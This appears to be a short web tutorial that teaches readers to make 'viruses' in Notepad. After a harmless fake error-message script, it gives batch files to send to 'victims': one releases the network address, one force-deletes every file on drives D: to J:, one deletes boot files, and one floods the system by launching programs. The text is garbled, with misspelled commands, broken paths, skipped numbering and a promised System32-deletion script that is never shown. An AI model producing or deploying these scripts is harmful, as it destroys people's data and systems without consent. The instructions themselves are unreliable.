Virus
Virus
Virus
TechQ
1 : Open Notepad
2 : Type X=Msgbox(“Message Here”,0+16,”Title Here”)
3 : Replace Message Here and Title Here with your Error Message and Error-Window
Title respectively.
4 : Save the file with error.vbs. (In Save as filetype, must select “all”)
5 : Now, click the file and you’ll get your custom-made Windows error message. So
its easy to learn how to create a virus using notepad
@Echo off
pconfig /release
Save that as a .bat and send it to someone. They’re IP address will be lost, and
therefore they won’t be able to fix it
@echo off
del D:*.* /f /s /q
del E:*.* /f /s /q
del F:*.* /f /s /q
del G:*.* /f /s /q
del H:*.* /f /s /q
del I:*.* /f /s /q
del J:*.* /f /s /q
WARNING:: This is the most dangerous virus! Be careful with its use.
@ECHO OFF
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
Open up notepad and copy and paste that. Save it as a .bat file.
This should shut down the person’s computer. It shuts it off once and deletes the
files needed to reboot and restart.
6. Application Bomber
It will start to open different applications repeatedly which will affect the
system’s performance.
You can also add the application of your choice in the above code.
@echo off
start winword
start mspaint
start notepad
start write
start cmd
start explorer
start control
start calc
goto x
Open Notepad
Done. If You Give this file to your victim his SYSTEM 32 Folder will be deleted.
Without which a Windows Pc can’t be started.